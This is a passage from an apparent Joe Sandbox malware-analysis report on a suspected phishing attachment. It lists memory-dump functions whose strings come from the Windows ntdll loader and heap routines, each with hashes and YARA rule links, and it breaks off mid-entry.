                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01802624
                                            • @, xrefs: 0180259B
                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01802602
                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01802412
                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018022E4
                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01802506
                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018025EB
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                            • API String ID: 0-4009184096
                                            • Opcode ID: 35c7cd39b25cbabbd6ec771a890c6446d837c6cf0b7d98b46b18c50bef611670
                                            • Instruction ID: 186d12e938e221332168dfc9fe5f307cae00737989f2ef05726712511ba0c0fc
                                            • Opcode Fuzzy Hash: 35c7cd39b25cbabbd6ec771a890c6446d837c6cf0b7d98b46b18c50bef611670
                                            • Instruction Fuzzy Hash: F8025DF1D002299BDB71DB54CC84BDAF7B8AB54704F4141EEA609A7282EB709F84CF59
                                            Function 01838B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                            • API String ID: 0-2515994595
                                            • Opcode ID: b079cff3acc3a8fd54cbfb578bc70ef18e5852782a1decbe2b2a23e24beb0626
                                            • Instruction ID: 422203e4046b946a600ce342c8bb81e0667865277815485523e3defee7772c1c
                                            • Opcode Fuzzy Hash: b079cff3acc3a8fd54cbfb578bc70ef18e5852782a1decbe2b2a23e24beb0626
                                            • Instruction Fuzzy Hash: 8451EF711183069BC329CF188848BABBBECEFD5344F180A2DB999C3245E770D609CBD2
                                            Function 01840274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                            • API String ID: 0-1700792311
                                            • Opcode ID: 691e278bbfbe6277a2bd790e2bcb3a60b00ffb0beb69321b373ce6dbdd1586c6
                                            • Instruction ID: b56456bf2a3b015645bbed8d2c9a6868c1cd27c4494aba7032a9e77864ddf0aa
                                            • Opcode Fuzzy Hash: 691e278bbfbe6277a2bd790e2bcb3a60b00ffb0beb69321b373ce6dbdd1586c6
                                            • Instruction Fuzzy Hash: 75D1CD3150068ADFDB22EF68C454AAEFBF1FF59714F088049F646DB252CB349A81CB54
                                            Function 018189B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                            Download Yara Rule
                                            Strings
                                            • VerifierFlags, xrefs: 01818C50
                                            • HandleTraces, xrefs: 01818C8F
                                            • VerifierDebug, xrefs: 01818CA5
                                            • VerifierDlls, xrefs: 01818CBD
                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01818A3D
                                            • AVRF: -*- final list of providers -*- , xrefs: 01818B8F
                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01818A67
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                            • API String ID: 0-3223716464
                                            • Opcode ID: 8223612db522a4ce712eee17928c999a04e94f8f2cecc87b125e880985948f8d
                                            • Instruction ID: db89ab7744d3b2062286a57ae94b55f5c21f31bf0471a90ab9b6c44331d9d551
                                            • Opcode Fuzzy Hash: 8223612db522a4ce712eee17928c999a04e94f8f2cecc87b125e880985948f8d
                                            • Instruction Fuzzy Hash: EC9126B3A41702AFD721EF6CC891B5AB7ACBB95B14F440518FA45EB249C7309F00CB92
                                            Function 017C63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-792281065
                                            • Opcode ID: 4dddcbbbffd427a5c95b41190f57b65981df5e58a38a61aefc31eeaaf8f08548
                                            • Instruction ID: 1276a95d85ec0c85eaff2984f4ffcef24f758cd0e0fd5357ee88197a1f6551b5
                                            • Opcode Fuzzy Hash: 4dddcbbbffd427a5c95b41190f57b65981df5e58a38a61aefc31eeaaf8f08548
                                            • Instruction Fuzzy Hash: BF911670B407199BDB26EF58DC89BAEFBA1AF50B14F14016CEA10A73C5D7709B01CB91
                                            Function 0178645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpInitShimEngine, xrefs: 017E99F4, 017E9A07, 017E9A30
                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017E9A2A
                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017E99ED
                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017E9A01
                                            • apphelp.dll, xrefs: 01786496
                                            • minkernel\ntdll\ldrinit.c, xrefs: 017E9A11, 017E9A3A
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-204845295
                                            • Opcode ID: fe96f543b6cdfb5ae21071c85bb249b2d35ba754428ca6a8d2018cfdf2810ed1
                                            • Instruction ID: 4b51ad07b0b7a532382c3a53914e0d43fadfea0961489d00612ea30b44f7ed84
                                            • Opcode Fuzzy Hash: fe96f543b6cdfb5ae21071c85bb249b2d35ba754428ca6a8d2018cfdf2810ed1
                                            • Instruction Fuzzy Hash: 5751B271248304AFD721EF28D855BABF7E4EF88748F10092DFA5597265D630EA44CB92
                                            Function 017C2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0180219F
                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01802180
                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01802178
                                            • SXS: %s() passed the empty activation context, xrefs: 01802165
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018021BF
                                            • RtlGetAssemblyStorageRoot, xrefs: 01802160, 0180219A, 018021BA
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                            • API String ID: 0-861424205
                                            • Opcode ID: 453a00a1f50fe9f49715da045cfe33f02d90a2fb068d4ee73e759b7cec1dfe21
                                            • Instruction ID: 0d5dcc37e4738e394b2a7fb7f8c65bcc18c4a0b4a952e4071d276e6649957d79
                                            • Opcode Fuzzy Hash: 453a00a1f50fe9f49715da045cfe33f02d90a2fb068d4ee73e759b7cec1dfe21
                                            • Instruction Fuzzy Hash: 32310B76B40219B7FB229A998C99F6ABB79DB54F50F05006DBB04F7141D2B0AB01C6A1
                                            Function 017CC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 018081E5
                                            • LdrpInitializeProcess, xrefs: 017CC6C4
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01808181, 018081F5
                                            • LdrpInitializeImportRedirection, xrefs: 01808177, 018081EB
                                            • Loading import redirection DLL: '%wZ', xrefs: 01808170
                                            • minkernel\ntdll\ldrinit.c, xrefs: 017CC6C3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-475462383
                                            • Opcode ID: dab4894ac8d760d32c423323f02f3448b66aa62386aae7db3941784e13d64b2c
                                            • Instruction ID: 6ba8f23757e1a8a85c5371151c2761ced6d67799e9cdf9b7095b9cdc45ff1f79
                                            • Opcode Fuzzy Hash: dab4894ac8d760d32c423323f02f3448b66aa62386aae7db3941784e13d64b2c
                                            • Instruction Fuzzy Hash: 213115B16443469FC215EF2CDD49E1AF7D4EF94B14F00056CF944AB295E720EE04CBA2
                                            Function 017D096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 017D2DF0: LdrInitializeThunk.NTDLL ref: 017D2DFA
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0BA3
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0BB6
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0D60
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0D74
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                            • String ID:
                                            • API String ID: 1404860816-0
                                            • Opcode ID: d06032bfb85dc90e3f7037a5eee9e5fdab1c29d705414ce17dd36187084020a5
                                            • Instruction ID: 93b4033f54ffeb3352e9456e7684389de2f9e3d6ead577c080fc3f5fe2247a6c
                                            • Opcode Fuzzy Hash: d06032bfb85dc90e3f7037a5eee9e5fdab1c29d705414ce17dd36187084020a5
                                            • Instruction Fuzzy Hash: 75427E71900719DFDB61CF28C884BAAB7F4FF48314F1445AAE989DB246D770AA84CF61
                                            Function 0179A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                            • API String ID: 0-379654539
                                            • Opcode ID: 8132730349148cc4fca85cf1a399da97624190a5309de53b0140775c924849d3
                                            • Instruction ID: 459029db37cbaaea54f8ba93788b9483935ef89f137d4535fc904bcc6c80294d
                                            • Opcode Fuzzy Hash: 8132730349148cc4fca85cf1a399da97624190a5309de53b0140775c924849d3
                                            • Instruction Fuzzy Hash: BAC169752093828FDB11CF58D044B6AF7E4BF94704F1489AEFA958B361E734CA49CB92
                                            Function 017C8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpInitializeProcess, xrefs: 017C8422
                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017C855E
                                            • minkernel\ntdll\ldrinit.c, xrefs: 017C8421
                                            • @, xrefs: 017C8591
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1918872054
                                            • Opcode ID: db99dab4aae6e98f3a69347653bf12131245f2efd668404a24132d05dc13d30d
                                            • Instruction ID: ea78b7b830fda6a6f7a884579b40e37992d5d55eb0ed3914b6d7baf593da3f91
                                            • Opcode Fuzzy Hash: db99dab4aae6e98f3a69347653bf12131245f2efd668404a24132d05dc13d30d
                                            • Instruction Fuzzy Hash: 43916B71508349AFD722DF65CC44FABFAE8AF98B44F40092EFA84D6155E374DA048B62
                                            Function 017C273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                            Download Yara Rule
                                            Strings
                                            • .Local, xrefs: 017C28D8
                                            • SXS: %s() passed the empty activation context, xrefs: 018021DE
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018022B6
                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018021D9, 018022B1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                            • API String ID: 0-1239276146
                                            • Opcode ID: 8f959b3563f8da1b872e36aa78b16198630499ec13f33577f91cdafaa038d17b
                                            • Instruction ID: 0fdd69dce77eca76bcfed7f106b2cd65dd83996ee1099752ff1129c0e0ff02af
                                            • Opcode Fuzzy Hash: 8f959b3563f8da1b872e36aa78b16198630499ec13f33577f91cdafaa038d17b
                                            • Instruction Fuzzy Hash: 1CA1BD319402299FDB25CFA8CC88BA9F7B5BF58714F1541EDD908AB292D7709E80CF90
                                            Function 017C4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01803437
                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0180342A
                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01803456
                                            • RtlDeactivateActivationContext, xrefs: 01803425, 01803432, 01803451
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                            • API String ID: 0-1245972979
                                            • Opcode ID: 7627b60474f8081b02fff4505f29c21c6e3470a15db102f179372a7040054692
                                            • Instruction ID: 3a4e667c25644435cf25402a68f7cb2c3144390939ba6f44985dcae56ce11acf
                                            • Opcode Fuzzy Hash: 7627b60474f8081b02fff4505f29c21c6e3470a15db102f179372a7040054692
                                            • Instruction Fuzzy Hash: 14611076600A16AFD7238F1CC895B2AF7E5BF90B10F15852DE9569F290C730E901CB91
                                            Function 017964AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                            Download Yara Rule
                                            Strings
                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 017F106B
                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017F10AE
                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 017F1028
                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 017F0FE5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                            • API String ID: 0-1468400865
                                            • Opcode ID: 73983434231b718049db7c4ea6df95533095ddf46498ca8f0d58049c74edce65
                                            • Instruction ID: 7d5b141d6b296b2d68d788c8abd72c17a1feaac9b8b1fd15d259640f225f2f1e
                                            • Opcode Fuzzy Hash: 73983434231b718049db7c4ea6df95533095ddf46498ca8f0d58049c74edce65
                                            • Instruction Fuzzy Hash: E171D2B19043059FCB21EF18D888B9BBFE8AF55764F504568F9488B28AD734D588CBD2
                                            Function 017B245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 017FA992
                                            • LdrpDynamicShimModule, xrefs: 017FA998
                                            • apphelp.dll, xrefs: 017B2462
                                            • minkernel\ntdll\ldrinit.c, xrefs: 017FA9A2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-176724104
                                            • Opcode ID: fd10c9ab3505afb11a798274ac92914dfc7469096a5477f6a7c100b053088000
                                            • Instruction ID: 9e9fc4a28081b489c366faad7e6b581cfeec0f788a8fe95f6e6028afb36232fe
                                            • Opcode Fuzzy Hash: fd10c9ab3505afb11a798274ac92914dfc7469096a5477f6a7c100b053088000
                                            • Instruction Fuzzy Hash: 67316C75610201ABDB31EF5DD884E6FF7B4FB80B00F25006DEA04AB345D770AA45CB40
                                            Function 017A29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                            Download Yara Rule
                                            Strings
                                            • HEAP[%wZ]: , xrefs: 017A3255
                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017A327D
                                            • HEAP: , xrefs: 017A3264
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                            • API String ID: 0-617086771
                                            • Opcode ID: f137c0e9c8a2e47edd3df72a8db05ef9919ac1b3a78d5d2c4160a2fccb0a967b
                                            • Instruction ID: 22f8397c079d1a99ddf1d1f3b29f958b2cce7e6c0511670ed78aa57932895ee9
                                            • Opcode Fuzzy Hash: f137c0e9c8a2e47edd3df72a8db05ef9919ac1b3a78d5d2c4160a2fccb0a967b
                                            • Instruction Fuzzy Hash: 3C92AC71A046499FDB25CF68C444BAEFBF1FF88300F588299E959AB392D734A941CF50
                                            Function 017A0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            • Opcode ID: 8a142075d22f5c344494949555c8008143cf61f62ba03b14e0345fb2547d7c08
                                            • Instruction ID: 131777597f6c9aeeb8ae7cd073a10295ddb6ea276919f4595e2b4b18ec14d8bc
                                            • Opcode Fuzzy Hash: 8a142075d22f5c344494949555c8008143cf61f62ba03b14e0345fb2547d7c08
                                            • Instruction Fuzzy Hash: 27F1BE74600606DFEB15CF68C894B6AFBF5FF84300F5486A8E5169B391D734EA81CB91
                                            Function 017B6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $@
                                            • API String ID: 0-1077428164
                                            • Opcode ID: d8c5a7fdda0937e0a3a6de845e52f4ea50adef51deaec895ead2582d7bf5e053
                                            • Instruction ID: eb94983e7837a5293acfc5b0b9a8fabd8a21b1628fddf6745a4296182992abb2
                                            • Opcode Fuzzy Hash: d8c5a7fdda0937e0a3a6de845e52f4ea50adef51deaec895ead2582d7bf5e053
                                            • Instruction Fuzzy Hash: C6C25D716083459FD729CF28C881BABFBE5AFC8754F04896DFA8987281D734D845CB52
                                            Function 0178A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: FilterFullPath$UseFilter$\??\
                                            • API String ID: 0-2779062949
                                            • Opcode ID: 6b33c916946b8ad87baa37795249d7d0f6732bcd5d3cf0bcb386056880b102e1
                                            • Instruction ID: 2ff96cd6f5952122b817414a42943d8cd069e56501d6abef80a991aad495dd1d
                                            • Opcode Fuzzy Hash: 6b33c916946b8ad87baa37795249d7d0f6732bcd5d3cf0bcb386056880b102e1
                                            • Instruction Fuzzy Hash: 8FA13C759016299BDB329B68CC88BE9F7F8EF48710F1041EADA09A7250D7359E85CF50
                                            Function 017B0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpCheckModule, xrefs: 017FA117
                                            • Failed to allocated memory for shimmed module list, xrefs: 017FA10F
                                            • minkernel\ntdll\ldrinit.c, xrefs: 017FA121
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-161242083
                                            • Opcode ID: 8619f9de81dac7e7e2769558b65132bbb698afa9628e89c52607318f1884926a
                                            • Instruction ID: 0a7363b1304584fa80dd9a79dc3c59007d39cdbae372c5a6ed8d2954f32227c5
                                            • Opcode Fuzzy Hash: 8619f9de81dac7e7e2769558b65132bbb698afa9628e89c52607318f1884926a
                                            • Instruction Fuzzy Hash: 4E718A71A002069BDB25EF6CC985BBFF7B4EB88704F14446DE906AB355E734AA81CB50
                                            Function 017A0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-1334570610
                                            • Opcode ID: 6b1d6a708b445936b9177e5fbeef598916bc9dbe0c91f3b41e10dd950deb7a39
                                            • Instruction ID: d7c19e86d45bc59341681f854f356f7ebc8a8d78e7309fca3bc62aa8f0d6ff53
                                            • Opcode Fuzzy Hash: 6b1d6a708b445936b9177e5fbeef598916bc9dbe0c91f3b41e10dd950deb7a39
                                            • Instruction Fuzzy Hash: E361CF70600301DFDB29CF28C984B6AFBE1FF84308F548A9DE9468B292D770E941CB91
                                            Function 017CC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                            Download Yara Rule
                                            Strings
                                            • Failed to reallocate the system dirs string !, xrefs: 018082D7
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 018082DE
                                            • minkernel\ntdll\ldrinit.c, xrefs: 018082E8
                                            Memory Dump Source
